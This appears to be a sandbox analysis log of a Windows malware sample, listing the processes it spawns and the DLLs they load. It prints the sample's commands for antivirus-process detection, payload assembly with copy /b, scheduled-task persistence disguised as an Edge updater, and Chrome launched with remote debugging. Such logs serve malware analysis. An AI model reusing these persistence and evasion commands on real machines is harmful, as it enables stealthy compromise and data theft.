Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe"
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp "C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp" /SL5="$50458,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Process created: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp "C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp" /SL5="$50450,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe "C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe"
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.EXE /S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2300,i,15689754464321030936,1754581674988053298,262144 /prefetch:8
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process created: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe "C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe"	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Process created: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe "C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe "C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe "C:\Users\user\AppData\Local\Temp\1062162001\f35b37b5a5.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe "C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1062161001\ca3f738a4c.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Investor Investor.cmd & Investor.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 36469
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Geographic
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "TEAMS" Mw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 36469\Avoiding.com + Hood + Centered + Collectors + Visual + Additionally + Celebration + Flesh + Ventures + Waters 36469\Avoiding.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Characterized + ..\Entries + ..\Arbitration + ..\Put + ..\Comics + ..\Japanese L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com Avoiding.com L
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Process created: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp "C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp" /SL5="$50458,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe"
Source: C:\Users\user\AppData\Local\Temp\is-HTIMB.tmp\21a4f8ff7d.tmp	Process created: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe "C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe	Process created: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp "C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp" /SL5="$50450,1104885,161792,C:\Users\user\AppData\Local\Temp\1062163001\21a4f8ff7d.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-G2DME.tmp\21a4f8ff7d.tmp	Process created: C:\Windows\SysWOW64\regsvr32.exe "regsvr32.exe" /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\regsvr32.exe /s /i:SYNC "C:\Users\user\AppData\Roaming\\uxtheme_2.drv"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" "Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute \"regsvr32\" -Argument \"/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv\") -Trigger (New-ScheduledTaskTrigger -Once -At (Get-Date).AddMinutes(1) -RepetitionInterval (New-TimeSpan -Minutes 1)) -TaskName 'MicrosoftEdgeUpdateTaskMachineUA{934473F6-3DB5-419B-8D3A-27C77AD9ADC5}' -Description 'MicrosoftEdgeUpdateTaskMachineUA' -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries -ExecutionTimeLimit 0) -RunLevel Highest"
Source: C:\Windows\System32\regsvr32.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1062164001\94cd0458cc.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy Turner Turner.cmd & Turner.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 764661
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Fm
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "Tunnel" Addresses
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 764661\Macromedia.com + Totally + York + Drunk + Baghdad + Benz + Glasses + Pac + Tender + Racing + Deluxe + Derived 764661\Macromedia.com
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Complement + ..\Soundtrack + ..\Plumbing + ..\Hills F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com Macromedia.com F
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\choice.exe choice /d y /t 15
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "AchillesGuard" /tr "wscript //B 'C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com "C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.com" "C:\Users\user\AppData\Local\GuardTech Solutions\r"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2400 --field-trial-handle=2300,i,15689754464321030936,1754581674988053298,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown

Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\SQ1NgqeTQy.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\VPW6HTTOAIDQ14BWA2DY59XSMKZYI.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\78K21CNZITPIMAK88B8Q.exe	Section loaded: explorerframe.dll	Jump to behavior
